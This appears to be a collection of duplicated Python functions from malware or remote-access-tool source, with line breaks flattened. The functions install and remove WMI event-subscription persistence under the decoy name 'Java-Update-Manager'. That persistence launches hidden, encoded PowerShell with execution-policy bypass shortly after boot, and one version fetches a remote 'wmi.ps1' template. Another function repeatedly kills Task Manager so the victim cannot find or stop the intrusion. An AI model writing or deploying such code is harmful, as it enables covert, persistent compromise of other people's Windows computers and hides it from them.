def _add_powershell_wmi(command=None, name='Java-Update-Manager'): try: if os.name == 'nt' and not methods['powershell_wmi'].established: cmd_line = "" value = sys.argv[0] if value and os.path.isfile(value): cmd_line = 'start /b /min {}'.format(value) elif command: cmd_line = r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -exec bypass -window hidden -noni -nop -encoded {}'.format( base64.b64encode(bytes(command).encode('UTF-16LE'))) if cmd_line: startup = "'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325" powershell = util.remote_import('wmi.ps1').replace( '[STARTUP]', startup).replace('[COMMAND_LINE]', cmd_line).replace('[NAME]', name) util.powershell(powershell) code = "Get-WmiObject __eventFilter -namespace root\\subscription -filter \"name='%s'\"" % name result = util.powershell(code) if name in result: return (True, result) except Exception as e: util.debug('{} error: {}'.format(_add_powershell_wmi.func_name, str(e))) return (False, None)
def _add_powershell_wmi(command=None, name='Java-Update-Manager'): try: global template_wmi if os.name == 'nt' and not _methods['powershell_wmi'].established: if command: cmd_line = r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -exec bypass -window hidden -noni -nop -encoded {}'.format(base64.b64encode(bytes(command).encode('UTF-16LE'))) startup = "'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325" script = template_wmi.substitute(STARTUP=startup, COMMAND_LINE=cmd_line, NAME=name) _ = util.powershell(script) code = "Get-WmiObject __eventFilter -namespace root\\subscription -filter \"name='%s'\"" % name result = util.powershell(code) if name in result: return (True, result) except Exception as e: util.log('{} error: {}'.format(_add_powershell_wmi.__name__, str(e))) return (False, None)
def _add_powershell_wmi(command=None, name='Java-Update-Manager'): try: global template_wmi if os.name == 'nt' and not _methods['powershell_wmi'].established: if command: cmd_line = r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -exec bypass -window hidden -noni -nop -encoded {}'.format(base64.b64encode(bytes(command).encode('UTF-16LE'))) startup = "'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325" script = template_wmi.substitute(STARTUP=startup, COMMAND_LINE=cmd_line, NAME=name) _ = util.powershell(script) code = "Get-WmiObject __eventFilter -namespace root\\subscription -filter \"name='%s'\"" % name result = util.powershell(code) if name in result: return (True, result) except Exception as e: util.log('{} error: {}'.format(_add_powershell_wmi.func_name, str(e))) return (False, None)
def block(process_name='taskmgr.exe'): """ Block a process from running by immediately killing it every time it spawns `Optional` :param str process_name: process name to block (default: taskmgr.exe) """ global template_block try: code = template_block.substitute(PROCESS=process_name) _ = util.powershell(code) return "Process {} blocked".format(process_name) except Exception as e: util.log("{} error: {}".format(block.func_name, str(e)))
def block(process_name='taskmgr.exe'): """ Block a process from running by immediately killing it every time it spawns `Optional` :param str process_name: process name to block (default: taskmgr.exe) """ global template_block try: code = template_block.substitute(PROCESS=process_name) _ = util.powershell(code) return "Process {} blocked".format(process_name) except Exception as e: util.log("{} error: {}".format(block.__name__, str(e)))
def _remove_powershell_wmi(value=None, name='Java-Update-Manager'): try: if _methods['powershell_wmi'].established: try: code = r""" Get-WmiObject __eventFilter -namespace root\subscription -filter "name='[NAME]'", Remove-WmiObject Get-WmiObject CommandLineEventConsumer -Namespace root\subscription -filter "name='[NAME]'" , Remove-WmiObject Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription , Where-Object { $_.filter -match '[NAME]'} , Remove-WmiObject""".replace('[NAME]', name) result = util.powershell(code) if not result: return (False, None) except: pass return (_methods['powershell_wmi'].established, _methods['powershell_wmi'].result) except Exception as e: util.log('{} error: {}'.format(_add_powershell_wmi.__name__, str(e))) return (_methods['powershell_wmi'].established, _methods['powershell_wmi'].result)
def _remove_powershell_wmi(value=None, name='Java-Update-Manager'): try: if _methods['powershell_wmi'].established: try: code = r""" Get-WmiObject __eventFilter -namespace root\subscription -filter "name='[NAME]'", Remove-WmiObject Get-WmiObject CommandLineEventConsumer -Namespace root\subscription -filter "name='[NAME]'" , Remove-WmiObject Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription , Where-Object { $_.filter -match '[NAME]'} , Remove-WmiObject""".replace('[NAME]', name) result = util.powershell(code) if not result: return (False, None) except: pass return (_methods['powershell_wmi'].established, _methods['powershell_wmi'].result) except Exception as e: util.log('{} error: {}'.format(_add_powershell_wmi.func_name, str(e))) return (_methods['powershell_wmi'].established, _methods['powershell_wmi'].result)
def remove_powershell_wmi(task_name='Java-Update-Manager'): try: if methods['powershell_wmi'].get('established'): try: code = """ Get-WmiObject __eventFilter -namespace root\subscription -filter "name='[NAME]'", Remove-WmiObject Get-WmiObject CommandLineEventConsumer -Namespace root\subscription -filter "name='[NAME]'" , Remove-WmiObject Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription , Where-Object { $_.filter -match '[NAME]'} , Remove-WmiObject""".replace( '[NAME]', task_name) result = util.powershell(code) if not result: return (False, None) except: pass return (methods['powershell_wmi']['established'], methods['powershell_wmi']['result']) except Exception as e: util.debug('{} error: {}'.format(add_powershell_wmi.func_name, str(e))) return (methods['powershell_wmi']['established'], methods['powershell_wmi']['result'])